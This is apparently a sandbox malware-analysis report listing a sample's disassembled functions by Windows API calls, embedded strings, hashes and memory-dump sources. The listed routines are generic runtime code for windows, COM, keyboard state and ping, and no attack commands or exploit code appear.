Opcode ID: 7e20d40be6b87b7a406a92b53c1688773aff789b5e4a0776c91b7137b2412763
Instruction ID: 9d39668479a51a465f15946c614e9b917be88ebbb7915edb25353e80be2cadba
Opcode Fuzzy Hash: 7e20d40be6b87b7a406a92b53c1688773aff789b5e4a0776c91b7137b2412763
Instruction Fuzzy Hash: 98114F75A902697DD720A7A2EC4AEFB6A7CFFD2B04F40042E7801A21D1EFB41945C9B5

Function 004C5CC6 Relevance: 18.2, APIs: 12, Instructions: 173COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 004C5CE2
GetWindowRect.USER32(00000000,?), ref: 004C5CFB
MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 004C5D59
GetDlgItem.USER32(?,00000002), ref: 004C5D69
GetWindowRect.USER32(00000000,?), ref: 004C5D7B
MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 004C5DCF
GetDlgItem.USER32(?,000003E9), ref: 004C5DDD
GetWindowRect.USER32(00000000,?), ref: 004C5DEF
MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 004C5E31
GetDlgItem.USER32(?,000003EA), ref: 004C5E44
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 004C5E5A
InvalidateRect.USER32(?,00000000,00000001), ref: 004C5E67

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 982ea2fe13039b5b3c6b179a1e0679dbc8b18ea0204d209ad51101a21b14cbec
Instruction ID: d70c714fc18614d34b59804f0ec672c1ef06d5ae788fbc3f4e6a4d1624fb1ebb
Opcode Fuzzy Hash: 982ea2fe13039b5b3c6b179a1e0679dbc8b18ea0204d209ad51101a21b14cbec
Instruction Fuzzy Hash: C0512E74A00609AFDF18DFA8DD89EAEBBB5FF48300F108129F516E6290D774AE50CB54

Function 00478BCD Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00478F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00478BE8,?,00000000,?,?,?,?,00478BBA,00000000,?), ref: 00478FC5

DestroyWindow.USER32(?), ref: 00478C81
KillTimer.USER32(00000000,?,?,?,?,00478BBA,00000000,?), ref: 00478D1B
DestroyAcceleratorTable.USER32(00000000), ref: 004B6973
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00478BBA,00000000,?), ref: 004B69A1
ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00478BBA,00000000,?), ref: 004B69B8
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00478BBA,00000000), ref: 004B69D4
DeleteObject.GDI32(00000000), ref: 004B69E6

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: 883196bc91dda6c861dd19934a8f3f5210570a2eaf58adf8b165266aa635ddc0
Instruction ID: 9c3104ae4632741f83e45f125aeb0b7f30f8d650d6d18c6a4cb6fc04cd01304f
Opcode Fuzzy Hash: 883196bc91dda6c861dd19934a8f3f5210570a2eaf58adf8b165266aa635ddc0
Instruction Fuzzy Hash: 0461DF31102A04DFCB229F25CA4CBA6B7F1FB50312F15842EE04696660CB3DAC95DFAD

Function 00479838 Relevance: 18.1, APIs: 12, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 00479944: GetWindowLongW.USER32(?,000000EB), ref: 00479952

GetSysColor.USER32(0000000F), ref: 00479862

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 60f8c9e4eb2333a84a9c13f3beb4f25a6b179d27d1ae0bcb7e9dae5d1bc4b3d7
Instruction ID: 49abae9fb685830ab754a35666ec2067027d6a27af7675cd2f42a571a5472271
Opcode Fuzzy Hash: 60f8c9e4eb2333a84a9c13f3beb4f25a6b179d27d1ae0bcb7e9dae5d1bc4b3d7
Instruction Fuzzy Hash: 9941F631104604AFDB20AF389C84BFA3765EB47330F158656F9A6873E2C7349C56DB2A

Function 00498D45 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 300COMMONLIBRARYCODE

Download Yara Rule

Strings

.H, xrefs: 0049903A, 00498FD0, 00498FF2

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID:
String ID: .H
API String ID: 0-3517028204
Opcode ID: 000a7701cf19c7e255fcd32ea79203c7306ebe34cea7a0359c515d3110f35046
Instruction ID: 9628de20ef0bae8b727ed34efa1f8a0e1666fdd509a95315f046531adeccf12a
Opcode Fuzzy Hash: 000a7701cf19c7e255fcd32ea79203c7306ebe34cea7a0359c515d3110f35046
Instruction Fuzzy Hash: F2C1D574904249AFCF11EFADC841BAEBFB0AF1A314F0440AEE414A7392D7399D41CB69

Function 004C96E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,004AF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 004C9717
LoadStringW.USER32(00000000,?,004AF7F8,00000001), ref: 004C9720

Part of subcall function 00469CB3: _wcslen.LIBCMT ref: 00469CBD

GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,004AF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 004C9742
LoadStringW.USER32(00000000,?,004AF7F8,00000001), ref: 004C9745
MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 004C9866

Strings

%s (%d) : ==> %s: %s %s, xrefs: 004C984A
Line %d:, xrefs: 004C97A0
Error: , xrefs: 004C981D
^ ERROR, xrefs: 004C97FB
Line %d (File "%s"):, xrefs: 004C978F

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wcslen
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 747408836-2268648507
Opcode ID: 19a31476a0610631bb85422a1430a13d8e9c6d892b0886a4e2feead43dca814e
Instruction ID: 96765a658cd88c22f2839ef2a518a4073c1762e1e8a88f945f020eb4e896224f
Opcode Fuzzy Hash: 19a31476a0610631bb85422a1430a13d8e9c6d892b0886a4e2feead43dca814e
Instruction Fuzzy Hash: EF415072800119BACF04FBE1DE86EEE7778AF15744F10002AF50572191EB796F58CB6A

Function 004E3C30 Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 004E3C5C
CoInitialize.OLE32(00000000), ref: 004E3C8A
CoUninitialize.OLE32 ref: 004E3C94
_wcslen.LIBCMT ref: 004E3D2D
GetRunningObjectTable.OLE32(00000000,?), ref: 004E3DB1
SetErrorMode.KERNEL32(00000001,00000029), ref: 004E3ED5
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 004E3F0E
CoGetObject.OLE32(?,00000000,004FFB98,?), ref: 004E3F2D
SetErrorMode.KERNEL32(00000000), ref: 004E3F40
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004E3FC4
VariantClear.OLEAUT32(?), ref: 004E3FD8

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
String ID:
API String ID: 429561992-0
Opcode ID: adbf72ad1bfd94c629e3187bc0a6520d20866a6a323a174d25bb31e9c31a5833
Instruction ID: 74c6c6cda9bc02109905c8eaabcbee811bbdf4afa5842451a52bc780b91572b3
Opcode Fuzzy Hash: adbf72ad1bfd94c629e3187bc0a6520d20866a6a323a174d25bb31e9c31a5833
Instruction Fuzzy Hash: A0C168716083459FC701DF2AC88892BB7E9FF8974AF10495EF98A9B210D734ED05CB56

Function 004D7A96 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 004D7AF3
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 004D7B8F
SHGetDesktopFolder.SHELL32(?), ref: 004D7BA3
CoCreateInstance.OLE32(004FFD08,00000000,00000001,00526E6C,?), ref: 004D7BEF
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 004D7C74
CoTaskMemFree.OLE32(?,?), ref: 004D7CCC
SHBrowseForFolderW.SHELL32(?), ref: 004D7D57
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 004D7D7A
CoTaskMemFree.OLE32(00000000), ref: 004D7D81
CoTaskMemFree.OLE32(00000000), ref: 004D7DD6
CoUninitialize.OLE32 ref: 004D7DDC

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
String ID:
API String ID: 2762341140-0
Opcode ID: 5f64f7d8f1a1ae00a3e905432e8c08937be20e25daa858dbfc3b7272b92459c6
Instruction ID: d60d577b556a29c98e7ba5142fa620e12237f671256b623660e931174b67e7ae
Opcode Fuzzy Hash: 5f64f7d8f1a1ae00a3e905432e8c08937be20e25daa858dbfc3b7272b92459c6
Instruction Fuzzy Hash: BBC13C75A04109AFCB14DF64C894DAEBBF9FF48308B1484AAE81ADB361D734ED45CB94

Function 004F541D Relevance: 16.7, APIs: 11, Instructions: 191windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 004F5504
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004F5515
CharNextW.USER32(00000158), ref: 004F5544
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 004F5585
SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 004F559B
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004F55AC

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: MessageSend$CharNext
String ID:
API String ID: 1350042424-0
Opcode ID: 3197feac09ec2e565c1793bc12f46911b419ef26e0a6b090fec981db835c465b
Instruction ID: 468c367aeb4a897be7bd70e50bea366bb712af8d26496121867b4906e382ca74
Opcode Fuzzy Hash: 3197feac09ec2e565c1793bc12f46911b419ef26e0a6b090fec981db835c465b
Instruction Fuzzy Hash: 2C61AF7090460CABEF10DF54CC84EFF7BB9EB05724F10815AFB25A6290D7788A81DB69

Function 004BFA88 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 004BFAAF
SafeArrayAllocData.OLEAUT32(?), ref: 004BFB08
VariantInit.OLEAUT32(?), ref: 004BFB1A
SafeArrayAccessData.OLEAUT32(?,?), ref: 004BFB3A
VariantCopy.OLEAUT32(?,?), ref: 004BFB8D
SafeArrayUnaccessData.OLEAUT32(?), ref: 004BFBA1
VariantClear.OLEAUT32(?), ref: 004BFBB6
SafeArrayDestroyData.OLEAUT32(?), ref: 004BFBC3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 004BFBCC
VariantClear.OLEAUT32(?), ref: 004BFBDE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 004BFBE9

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: e46590948e353067ebe34db3338f9762b51b366d2a31946722aff7e11fa16869
Instruction ID: 657759bf5f5285aa59d673552449789bc0d1aa2e2d3a3abb76040c6c788237a4
Opcode Fuzzy Hash: e46590948e353067ebe34db3338f9762b51b366d2a31946722aff7e11fa16869
Instruction Fuzzy Hash: 50415035A002199FCB04DF65CC949FEBBB9EF48344F00846AE949A7261DB34A949CFA4

Function 004C9C79 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 004C9CA1
GetAsyncKeyState.USER32(000000A0), ref: 004C9D22
GetKeyState.USER32(000000A0), ref: 004C9D3D
GetAsyncKeyState.USER32(000000A1), ref: 004C9D57
GetKeyState.USER32(000000A1), ref: 004C9D6C
GetAsyncKeyState.USER32(00000011), ref: 004C9D84
GetKeyState.USER32(00000011), ref: 004C9D96
GetAsyncKeyState.USER32(00000012), ref: 004C9DAE
GetKeyState.USER32(00000012), ref: 004C9DC0
GetAsyncKeyState.USER32(0000005B), ref: 004C9DD8
GetKeyState.USER32(0000005B), ref: 004C9DEA

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 01c0da05f512fb47265b03391c9b67c4423b23a03849e7fb39a4a763cc5634ad
Instruction ID: e1426aef5b0e95a95c3b15ef5758d0fa19172c3c5173d0c8d57ec8dcdcfaaf5e
Opcode Fuzzy Hash: 01c0da05f512fb47265b03391c9b67c4423b23a03849e7fb39a4a763cc5634ad
Instruction Fuzzy Hash: 0441C9785047C979FFB08660944CBB7BEA06B21344F08405FD5C7567C2DBA85DD4C79A

Function 004E055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 004E05BC
inet_addr.WSOCK32(?), ref: 004E061C
gethostbyname.WSOCK32(?), ref: 004E0628
IcmpCreateFile.IPHLPAPI ref: 004E0636
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 004E06C6
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 004E06E5
IcmpCloseHandle.IPHLPAPI(?), ref: 004E07B9
WSACleanup.WSOCK32 ref: 004E07BF

Strings

Ping, xrefs: 004E0676

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: a32eeca2834e05c6ba94c9f9c26ef7b4a0f4a18489764fb925c1b8092c0bb0d4
Instruction ID: 04cb17057558074ed0a585c56fbd1ca8abdfe0031b9b0f4d153c50d42ce90edf
Opcode Fuzzy Hash: a32eeca2834e05c6ba94c9f9c26ef7b4a0f4a18489764fb925c1b8092c0bb0d4
Instruction Fuzzy Hash: E591A2355042419FD320DF16C584F16BBE0AF44319F1485AAF4698B7A2D7B8FC85CF96

Function 004E8CD3 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00000000,?), ref: 004E8CF3

Part of subcall function 004C8E54: _wcslen.LIBCMT ref: 004C8E77

_wcslen.LIBCMT ref: 004E8D4E
_wcslen.LIBCMT ref: 004E8D9C
_wcslen.LIBCMT ref: 004E8DDC
_wcslen.LIBCMT ref: 004E8E6E

Strings

winapi, xrefs: 004E8D96, 004E8D9B
none, xrefs: 004E8E65, 004E8E6A
cdecl, xrefs: 004E8D48, 004E8D4D
stdcall, xrefs: 004E8DD6, 004E8DDB

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: _wcslen$BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 707087890-567219261
Opcode ID: 3d3a3dbeff5249dec34663ce285da7c3ad856f142f89846cc829c2a7eba657db
Instruction ID: 62cc4cd6bd3d9734bcf478f2df70ac7e92df4aae7ad697c5e17752d4e4d6be59
Opcode Fuzzy Hash: 3d3a3dbeff5249dec34663ce285da7c3ad856f142f89846cc829c2a7eba657db
Instruction Fuzzy Hash: 0E51AF31A005569BCF24DF6EC9408BEB7A5BF65325B20422EE42AE73C4EB38DD40C794

Function 004E372C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 004E3774
CoUninitialize.OLE32 ref: 004E377F
CoCreateInstance.OLE32(?,00000000,00000017,004FFB78,?), ref: 004E37D9
IIDFromString.OLE32(?,?), ref: 004E384C
VariantInit.OLEAUT32(?), ref: 004E38E4
VariantClear.OLEAUT32(?), ref: 004E3936

Strings

NULL Pointer assignment, xrefs: 004E381E
Invalid parameter, xrefs: 004E3865
Failed to create object, xrefs: 004E37E4, 004E389A

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 636576611-1287834457
Opcode ID: 08e8079de9fd63788d707a42a7a17d6a23c56c0b213ea681f3f439506456e5f9
Instruction ID: 6892d6f093da50fb96adffc1378f852e60adad5bd14d5f52328d89f78d30b049
Opcode Fuzzy Hash: 08e8079de9fd63788d707a42a7a17d6a23c56c0b213ea681f3f439506456e5f9
Instruction Fuzzy Hash: F561D370608341AFD311EF56C888B6ABBE4FF44716F00485EF48597291D778EE49CB9A

Function 004F8B02 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00479BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00479BB2

Part of subcall function 0047912D: GetCursorPos.USER32(?), ref: 00479141
Part of subcall function 0047912D: ScreenToClient.USER32(00000000,?), ref: 0047915E
Part of subcall function 0047912D: GetAsyncKeyState.USER32(00000001), ref: 00479183
Part of subcall function 0047912D: GetAsyncKeyState.USER32(00000002), ref: 0047919D

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 004F8B6B
ImageList_EndDrag.COMCTL32 ref: 004F8B71
ReleaseCapture.USER32 ref: 004F8B77
SetWindowTextW.USER32(?,00000000), ref: 004F8C12
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 004F8C25
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 004F8CFF

Strings

@GUI_DRAGFILE, xrefs: 004F8C9A
@GUI_DROPID, xrefs: 004F8C51
p#S, xrefs: 004F8C71

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID$p#S
API String ID: 1924731296-2397383779
Opcode ID: 648f2880f4f4fa75d798e1cbe6c916ae4eba0990fc6dffbab70f03a5bb432aa2
Instruction ID: ef36a25505c283cf6e44c0c946149aced864c697ae879519a5d01f0fed132186
Opcode Fuzzy Hash: 648f2880f4f4fa75d798e1cbe6c916ae4eba0990fc6dffbab70f03a5bb432aa2
Instruction Fuzzy Hash: 5751AD71104208AFD700DF21DD95BBA77E4FB88714F00052EFA569B2E1DB749D18CB6A

Function 004D3388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 004D33CF

Part of subcall function 00469CB3: _wcslen.LIBCMT ref: 00469CBD

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 004D33F0

Strings

"%s" (%d) : ==> %s:, xrefs: 004D3522
Incorrect parameters to object property !, xrefs: 004D34AB
^ ERROR , xrefs: 004D349E
Error: , xrefs: 004D34D1
Line %d (File "%s"):, xrefs: 004D3443, 004D345C
"%s" (%d) : ==> %s:%s%s, xrefs: 004D3504

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
